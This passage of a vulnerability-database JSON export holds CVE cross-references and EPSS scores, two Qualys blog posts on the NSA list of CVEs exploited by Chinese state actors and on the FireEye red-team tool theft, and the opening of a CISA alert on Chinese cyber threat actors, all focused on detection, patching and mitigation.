"THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDC9BA5F3C0866F008FA19229719AA13", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:1D57AF69829D398639E3A4113B667998", "TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:A08558154279E1489712528387FEF700"]}, {"type": "ubuntu", "idList": ["USN-3565-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-6789"]}, {"type": "zdi", "idList": ["ZDI-20-128", "ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-28326", "1337DAY-ID-32569", 
"1337DAY-ID-32826", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33828"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-4852", "epss": "0.963130000", "percentile": "0.991990000", "modified": "2023-03-15"}, {"cve": "CVE-2017-6327", "epss": "0.498520000", "percentile": "0.969030000", "modified": "2023-03-15"}, {"cve": "CVE-2018-4939", "epss": "0.973180000", "percentile": "0.997540000", "modified": "2023-03-16"}, {"cve": "CVE-2018-6789", "epss": "0.974750000", "percentile": "0.999330000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0708", "epss": "0.975180000", "percentile": "0.999690000", "modified": "2023-03-15"}, {"cve": "CVE-2019-0803", "epss": "0.000500000", "percentile": "0.174800000", "modified": "2023-03-15"}, {"cve": "CVE-2019-1040", "epss": "0.448210000", "percentile": "0.967710000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11510", "epss": "0.975040000", "percentile": "0.999580000", "modified": "2023-03-15"}, {"cve": "CVE-2019-11580", "epss": "0.974820000", "percentile": "0.999380000", "modified": "2023-03-16"}, {"cve": "CVE-2019-18935", "epss": "0.875440000", "percentile": "0.980240000", "modified": "2023-03-15"}, {"cve": "CVE-2019-19781", "epss": "0.975420000", "percentile": "0.999870000", "modified": "2023-03-15"}, {"cve": "CVE-2019-3396", "epss": "0.975030000", "percentile": "0.999560000", "modified": "2023-03-15"}, {"cve": "CVE-2020-0601", "epss": "0.973090000", "percentile": "0.997420000", "modified": "2023-03-16"}, {"cve": "CVE-2020-0688", "epss": "0.974590000", "percentile": "0.999100000", "modified": "2023-03-15"}, {"cve": "CVE-2020-10189", "epss": "0.971730000", "percentile": "0.996340000", "modified": "2023-03-16"}, {"cve": "CVE-2020-2555", "epss": "0.957330000", "percentile": "0.990080000", "modified": "2023-03-15"}, {"cve": "CVE-2020-3118", "epss": "0.002190000", "percentile": "0.581040000", "modified": "2023-03-16"}, {"cve": "CVE-2020-5902", "epss": "0.975670000", "percentile": "0.999950000", "modified": 
"2023-03-16"}, {"cve": "CVE-2020-8193", "epss": "0.974430000", "percentile": "0.998900000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8195", "epss": "0.958460000", "percentile": "0.990450000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8196", "epss": "0.002140000", "percentile": "0.576700000", "modified": "2023-03-16"}, {"cve": "CVE-2020-8515", "epss": "0.972460000", "percentile": "0.996840000", "modified": "2023-03-15"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1678920471, "score": 1698841279, "epss": 1679045529}, "_internal": {"score_hash": "dd64e6ab57d1d6ed1a76bb47b557e693"}}
{"qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. 
\n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server versions| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| 
Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize these vulnerabilities for the "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. 
With trending enabled for dashboard widgets, you can keep track of the trend of these vulnerabilities in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploitation, organizations should do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * An organization's vigilance team should keep a close eye on indicators of compromise (IOCs) and maintain strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", 
"CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T00:22:53", "description": "**Update Jan 5, 2021**: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\n**Update Dec 23, 2020**: Added a new section on compensating controls.\n\n**Update Dec 22, 2020**: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.\n\nUsing Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n**Original post**: On December 8, 2020, [FireEye disclosed](<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>) theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security posture of their customers. According to FireEye, the hackers now have an influential collection of new techniques to draw upon. It is unclear today if the attackers intend to use the tools themselves or if they intend to release the tools publicly in some way. \n\n\u201cThe attackers tailored their world-class capabilities specifically to target and attack FireEye. They are highly trained in operational security and executed with discipline and focus. 
They operated clandestinely, using methods that counter security tools and forensic examination,\u201d said Kevin Mandia, CEO of FireEye. However, the stolen tools did not contain zero-day exploits. \n\nIn response to the breach, FireEye has provided Red Team tool countermeasures which are [available on GitHub](<https://github.com/fireeye/red_team_tool_countermeasures>). These countermeasures include rules in multiple languages such as Snort, Yara, ClamAV and HXIOC. Since none of the leaked tools leverage zero-day attacks, FireEye also provided a [listing of CVEs](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) used by these tools. \n\nAn analysis of these tools shows that the functionality and capabilities may mimic some existing red team tools such as Metasploit or Cobalt Strike. Similar to how the Shadow Brokers leak led to outbreaks such as WannaCry, it is possible that this breach could lead to other commodity malware leveraging these capabilities. Any time there is high-fidelity threat intelligence such as the countermeasures provided by FireEye, it is important to look at it under the lens of how you can protect your organization going forward, as well as how you can validate if this has been used in your organization previously. \n\n### Mitigation & Protection \n\n[Snort](<https://www.snort.org/>) is an open-source intrusion prevention system (IPS) which uses an open format for its rule structure. While many companies use the open-source version of Snort, commercial IPS tools are also able to leverage the Snort rule format. Most of these rules are tuned to specifically look for beacon traffic or components of remote access tools. If your organization is using an IPS or IDS, you should plug in these signatures to look for evidence of future exploitation.\n\n[ClamAV](<https://www.clamav.net/>) is an open-source antivirus engine which is now owned by Cisco. 
To prevent these tools from executing on the endpoint, the provided signatures can be imported into this AV engine or any other antivirus that uses the ClamAV engine.\n\n[Yara](<https://github.com/VirusTotal/yara>) was designed by VirusTotal to help malware researchers both identify and classify malware samples. Yara can be used as a standalone scanning engine or built into many endpoint security products as well. The provided rules can be imported into many endpoint security tools to match and block future execution of known malware.\n\nAnother important aspect of preventing the use of these red teaming tools in your environment is to address the vulnerabilities they are known to exploit. There are 16 vulnerabilities which have been prioritized based on the CVSS score associated with them. Using a vulnerability management product such as [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can proactively search which endpoints or devices have these vulnerabilities and deploy patches or configuration fixes to resolve them before an adversary has a chance to exploit them. \n\n### Threat Hunting \n\nHunting for evidence of a breach is just as important as trying to prevent the breach. Two of the components FireEye released to help this search are HXIOC and Yara rules. These help define what triggers to look for to determine whether the organization has been breached by these tools. \n\nThe HXIOC rules provided are based on the [OpenIOC](<https://github.com/mandiant/OpenIOC_1.1>) format originally created by Mandiant. These are similar to the STIX and CyBOX formats maintained by [OASIS](<https://www.oasis-open.org/committees/tc_home.php?wg_abbrev=cti>). The rules provided by FireEye call out many process names and associated command line arguments which can be used to hunt for the evidence of an attack. 
\n\nBy using the provided Yara rule which encompasses all of the Yara countermeasures, you can scan multiple directories using the standalone Yara engine by issuing the \u201cyara -r all-rules.yara <path>\u201d, where <path> is the location you want to recursively scan. \n\nAlternatively, VirusTotal also has a useful API called [RetroHunt](<https://support.virustotal.com/hc/en-us/articles/360001293377-Retrohunt>) which allows you to scan files submitted within the last 12 months. [Florian Roth](<https://twitter.com/cyb3rops/status/1336583694912516096>) has gone through and submitted all of the provided Yara rules to RetroHunt and created a [Google Sheets document](<https://docs.google.com/spreadsheets/d/1uRAT-khTdp7fp15XwkiDXo8bD0FzbdkevJ2CeyXeORs/edit>) containing all of the detections. In this document you can see valuable information such as the number of detections and file hashes for each of the detected samples. \n\n### Detect 16 Publicly Known Vulnerabilities using Qualys VMDR \n\nHere is a prioritized list of CVEs published on [Github](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>) by FireEye:\n\n**CVE** **ID**| **Name**| **CVSS**| **Qualys** **QID(s)** \n---|---|---|--- \nCVE-2019-11510| Pre-auth arbitrary file reading from Pulse Secure SSL VPNs| 10| 38771 \nCVE-2020-1472| Microsoft Active Directory escalation of privileges| 10| 91668 \nCVE-2018-13379| pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN| 9.8| 43702 \nCVE-2018-15961| RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell)| 9.8| 371186 \nCVE-2019-0604| RCE for Microsoft Sharepoint| 9.8| 110330 \nCVE-2019-0708| RCE of Windows Remote Desktop Services (RDS)| 9.8| 91541, 91534 \nCVE-2019-11580| Atlassian Crowd Remote Code Execution| 9.8| 13525 \nCVE-2019-19781| RCE of Citrix Application Delivery Controller and Citrix Gateway| 9.8| 150273, 372305 \nCVE-2020-10189| RCE for ZoHo ManageEngine Desktop 
Central| 9.8| 372442 \nCVE-2014-1812| Windows Local Privilege Escalation| 9| 91148, 90951 \nCVE-2019-3398| Confluence Authenticated Remote Code Execution| 8.8| 13475 \nCVE-2020-0688| Remote Command Execution in Microsoft Exchange| 8.8| 50098 \nCVE-2016-0167| local privilege escalation on older versions of Microsoft Windows| 7.8| 91204 \nCVE-2017-11774| RCE in Microsoft Outlook via crafted document execution (phishing)| 7.8| 110306 \nCVE-2018-8581| Microsoft Exchange Server escalation of privileges| 7.4| 53018 \nCVE-2019-8394| Arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus| 6.5| 374547 \n \nQualys released several remote and authenticated QIDs for CVEs published by FireEye. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.qid: [38771, 91668, 43702, 371186, 110330, 91541, 91534, 13525, 150273, 372305, 372442, 91148, 90951, 13475, 50098, 91204, 110306, 53018, 374547]_\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable hosts through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nWith VMDR Dashboard, you can track these 16 publicly known vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of trends for these vulnerabilities in your environment using the [FireEye Theft Top 16 CVEs & IOC Hashes](<https://qualys-secure.force.com/customer/s/article/000006470>) dashboard. \n\n \n\n### **Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools** \n\nTo reduce the overall security risk, it is important to address misconfigurations associated with the CVEs in addition to general security hygiene and system hardening. 
\n\nQualys customers can leverage the newly released policy \u201c_Compensating Controls for Reducing Risk of Vulnerabilities Leveraged by FireEye Red Team Tools_.\u201d This policy contains controls which can be used as workarounds / mitigations for these vulnerabilities if patching cannot be done immediately. \n\n**Control List: ** \n\nCVE IDs| Control ID | Statement \n---|---|--- \nCVE-2020-1472| 20002| Status of the 'Domain controller: Allow vulnerable Netlogon secure channel connections' Group policy setting \nCVE-2018-13379 | 20010 | Status of the source interface setting for SSL-VPN \nCVE-2019-19781| 13952 | Status of 'Responder' feature configured on the appliance \nCVE-2019-19781 | 20011 | Status of the responder action configured on the device \nCVE-2019-19781 | 20008 | Status of the responder policies configured on the device \nCVE-2019-19781 | 20009 | Status of the responder global binds configured on the device \nCVE-2016-0167 | 19440 | Status of Trust Center "Block macros from running in Office files from the Internet" setting for a user profile \nCVE-2018-8581 | 20007 | Status of the 'DisableLoopbackCheck' setting \nCVE-2019-0708 | 10404 | Status of the 'Require user authentication for remote connections by using Network Level Authentication' setting \nCVE-2019-0708 | 7519 | Status of the 'Allow users to connect remotely using Remote Desktop Services (Terminal Services)' setting \nCVE-2019-0708 | 1430 | Status of the 'Terminal Services' service \nCVE-2019-0708 | 3932 | Status of the 'Windows Firewall: Inbound connections (Public)' setting \nCVE-2019-0708 | 3948 | Status of the 'Windows Firewall: Inbound connections (Private)' setting \nCVE-2019-0708 | 3949 | Status of the 'Windows Firewall: Inbound connections (Domain)' setting \nCVE-2019-0708 | 3950 | Status of the 'Windows Firewall: Firewall state (Public)' setting \nCVE-2019-0708 | 3951 | Status of the 'Windows Firewall: Firewall state (Private)' setting \nCVE-2019-0708 | 3952 | Status of the 
'Windows Firewall: Firewall state (Domain)' setting \nCVE-2019-0708 | 11220 | List of 'Inbound Rules' configured in Windows Firewall with Advanced Security via GPO \nCVE-2017-11774 | 13843 | Status of the 'Do not allow folders in non-default stores to be set as folder home pages' setting \nCVE-2017-11774 | 20003 | Status of the 'EnableRoamingFolderHomepages' registry setting \nCVE-2017-11774 | 20004 | Status of the 'Do not allow Home Page URL to be set in folder Properties' Group policy setting \n \nWith Qualys Configuration Management, you can easily identify misconfigured systems in the context of these vulnerabilities. The screenshot below shows the total passing and failing controls for the impacted assets in the report.\n\n\n\nView control posture details with remediation steps. The screenshot below shows control pass/fail details along with actual evidence from the impacted asset. \n\n\n\n### FireEye Disclosure of the Theft of their Red Team Assessment Tools \n\nHackers now have an influential collection of new techniques to draw upon. 
Qualys released a new RTI for Solorigate/SUNBURST vulnerabilities so customers can effectively prioritize these CVEs in their environment.\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following real-time threat indicators (RTIs):\n\n * Active Attacks\n * Solorigate Sunburst (**New RTI**)\n\n\n### Remediate FireEye-Related Vulnerabilities with Qualys Patch Management\n\n#### Identify and Install Needed Patches\n\nTo view the relevant missing patches in your environment that are required to remediate the vulnerabilities leveraged by the FireEye tools, you may run the following QQL in the Patches tab of [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>):\n \n \n (qid: [91541,372442,38771,91534,91204,110330,371186,91148,90951,43702,374547,372305,110306,50098,91668,13475,53018,13525,150273])\n\n\n\nIt is highly recommended to select all the patches returned by this QQL and add them to a new on-demand patch job. You can then target as many assets as possible and deploy the patch job as soon as possible. Note that the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) will only deploy the right patch to the right asset, meaning the Qualys patch job will do the mapping of patch to asset (so you don\u2019t have to), ensuring only the right patch is deployed to the right asset (in terms of binary architecture, OS version, etc.). In addition, if a patch is not needed by a specific asset, the Qualys agent will \u201cskip\u201d this asset and the patch will not be deployed.\n\nThe same QQL can be used in the patch assets tab in order to see all the assets that are missing at least one of the FireEye-related patches:\n\n\n\n#### Visualize Assets Requiring Patches\n\nQualys has created two dashboard widgets that you can import into the patch management dashboard. 
These widgets will show the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.\n\nSteps to Import the Widget:\n\n * Click on the "Setting" icon in the "Dashboard" section.\n * Select the "Import New Widget" option.\n * Enter a name of your choice for the widget.\n * Browse to the JSON file to import.\n * Click on the "Import" button.\n * On success, you should see the new widget in your Dashboard.\n\nYou can download these two dashboard widgets from the PatchMGMT-Fireeye-Widgets attachment at the bottom of the [FireEye Theft dashboards](<https://qualys-secure.force.com/customer/s/article/000006470>) article. \n\n### Hunting in Endpoint Detection and Response (EDR) \n\nThere are two components to hunt for evidence of these tools using the [Qualys EDR](<https://www.qualys.com/apps/endpoint-detection-response/>). The first is looking for evidence of the files from the provided Yara signatures. Qualys has taken the file hashes from the RetroHunt tool and created a dashboard. With a single click you can find evidence of any matches in your environment. \n\nThe second component is hunting for evidence of the processes outlined in the OpenIOC signatures. While these signatures cannot be imported directly into Qualys EDR, the Qualys Labs team is converting these into Qualys Query Language (QQL) which can be used in the Qualys EDR hunting page. An example provided here shows hunting for [this Seatbelt signature](<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/rules/BELTALOWDA/supplemental/hxioc/SEATBELT%20\\(UTILITY\\).ioc>). In the coming days, these hunting queries will be available to all Qualys EDR customers. \n\n\n\n\n\n### Get Started Now \n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect and patch the high-priority publicly known vulnerabilities. 
\n\nStart your [Qualys EDR trial](<https://www.qualys.com/apps/endpoint-detection-response/>) to protect the entire attack chain, from attack and breach prevention to detection and response using the power of the Qualys Cloud Platform \u2013 all in a single, cloud-based app. \n\nStart your [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) trial to access the Live Threat Intelligence Feed that displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details. \n\n### References \n\n<https://github.com/fireeye/red_team_tool_countermeasures>\n\n<https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html>\n\n<https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md>\n\n<https://www.fireeye.com/blog/threat-research/2020/12/unauthorized-access-of-fireeye-red-team-tools.html>", "cvss3": {}, "published": "2020-12-10T00:48:29", "type": "qualysblog", "title": "Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-1812", "CVE-2016-0167", "CVE-2017-11774", "CVE-2018-13379", "CVE-2018-15961", "CVE-2018-8581", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-19781", "CVE-2019-3398", "CVE-2019-8394", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1472"], "modified": "2020-12-10T00:48:29", "id": "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-12-03T17:29:53", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. 
See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. 
Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks\u2013either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. 
